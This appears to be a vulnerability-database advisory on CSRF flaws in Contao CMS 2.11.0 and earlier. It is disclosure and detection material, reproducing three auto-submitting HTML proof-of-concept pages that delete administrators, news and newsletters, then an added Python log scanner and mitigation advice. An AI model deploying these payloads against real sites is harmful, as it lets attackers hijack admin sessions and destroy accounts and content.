Contao 'main.php' Multiple Cross-Site Request Forgery Vulnerabilities

Vulnerability ID: 1120932    Vulnerability type: Cross-Site Request Forgery
Published: 2012-02-26    Updated: 2019-06-12
CVE ID: CVE-2012-1297    CNNVD ID: CNNVD-201203-339
Platform: PHP    CVSS score: 6.8
|Vulnerability source
https://www.exploit-db.com/exploits/18527
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-339
|Vulnerability details
Contao is an open-source content management system (CMS) written in PHP. It supports search engines, permission management, a CSS framework and more. Multiple cross-site request forgery (CSRF) vulnerabilities exist in main.php in Contao (formerly TYPOlight) 2.11.0 and earlier. Remote attackers can exploit them to hijack the authentication of administrators for requests that (1) delete users via a delete action in the user module, (2) delete news via a delete action in the news module, or (3) delete newsletters via a delete action in the newsletters module.
|Exploit (EXP)
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)
# Date          : 25-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://www.contao.org/en/download.html
# Vendor site   : http://www.contao.org
# Version       : 2.11.0 (latest) and lower 
# Tested on     : Debian Squeeze (6.0) 
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+

Summary
1)Introduction
2)Vulnerabilities Description
  2.1 Delete Administrators or Users 
  2.2 Delete News
  2.3 Delete Newsletter
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
is easy to maintain".

2)Vulnerabilities Description
Contao 2.11 (and lower) is affected by a CSRF vulnerability which allows an attacker to delete admins/users and delete web pages
(articles, news, newsletters and so on).
 
 2.1 Delete Administrators or Users
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete ADMIN/USER account</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">
  </form>
  </body>
  </html>

  Note that it is possible to delete any admin/user, including the first administrator (id=1) created during Contao's installation phase.
  
  2.2 Delete News
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete News</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">
  </form>
  </body>
  </html>


  2.3 Delete Newsletter 
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete Newsletter</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">
  </form>
  </body>
  </html>
+--------------------------------------------------------------------------------------------------------------------------------+
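All three proof-of-concept pages above make the victim's browser POST to the backend's main.php with act=delete, so on the server side a forged delete looks like a normal authenticated request except for its origin. The following detection script is an added example, not part of the advisory or of Contao: it scans web-server access logs in Apache/Nginx "combined" format for POSTs to main.php?act=delete on the user, news or newsletter module whose Referer is absent or names a host other than the site's own. The log lines, the hostnames and the function name are constructed for the example.

```python
# Added example (not from the advisory): flag backend delete requests whose
# Referer is missing or cross-origin, the trace a forged cross-site POST leaves.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in Apache/Nginx "combined" format; not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Feb/2012:10:01:12 +0000] "POST /contao/main.php?do=user&act=delete&id=2 HTTP/1.1" 302 0 "http://evil.example/csrf.html" "Mozilla/5.0"
198.51.100.7 - - [26/Feb/2012:10:01:30 +0000] "POST /contao/main.php?do=news&act=delete&id=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Feb/2012:10:02:01 +0000] "POST /contao/main.php?do=newsletter&act=delete&id=1 HTTP/1.1" 302 0 "http://cms.example/contao/main.php?do=newsletter" "Mozilla/5.0"
203.0.113.5 - - [26/Feb/2012:10:02:05 +0000] "GET /contao/main.php?do=user HTTP/1.1" 200 5120 "http://cms.example/contao/main.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"')

# Backend modules the advisory names: do=user, do=news, do=newsletter.
AFFECTED_MODULES = {"user", "news", "newsletter"}


def find_forged_deletes(log_text, site_host):
    """Return one finding per POST to main.php?act=delete on an affected
    module whose Referer is missing or names a host other than site_host."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparseable line, or not a state-changing request
        url = urlsplit(m["target"])
        q = parse_qs(url.query)
        module = q.get("do", [""])[0]
        if (not url.path.endswith("/main.php") or q.get("act", [""])[0] != "delete"
                or module not in AFFECTED_MODULES):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "missing referer"
        else:
            ref_host = (urlsplit(referer).hostname or "").lower()
            if ref_host == site_host.lower():
                continue  # same-origin: consistent with a real backend action
            reason = "cross-origin referer " + ref_host
        findings.append({"ip": m["ip"], "module": module,
                         "id": q.get("id", [""])[0], "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in find_forged_deletes(SAMPLE_LOG, "cms.example"):
        print(finding)
```

A missing Referer is only a triage signal, since privacy extensions and referrer policies strip it for legitimate users too; the durable fix is a per-session request token checked on every state-changing backend request, which is what upgrading past the affected versions provides.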
|References

Source: XF
Name: contao-newsletter-csrf(73479)
Link: http://xforce.iss.net/xforce/xfdb/73479
Source: EXPLOIT-DB
Name: 18527
Link: http://www.exploit-db.com/exploits/18527
Source: SECUNIA
Name: 48180
Link: http://secunia.com/advisories/48180
Source: packetstormsecurity.org
Link: http://packetstormsecurity.org/files/110214/ContaoCMS-2.11.0-Cross-Site-Request-Forgery.html
Source: ivanobinetti.blogspot.com
Link: http://ivanobinetti.blogspot.com/2012/02/contaocms-fka-typolight-211-csrf-delete.html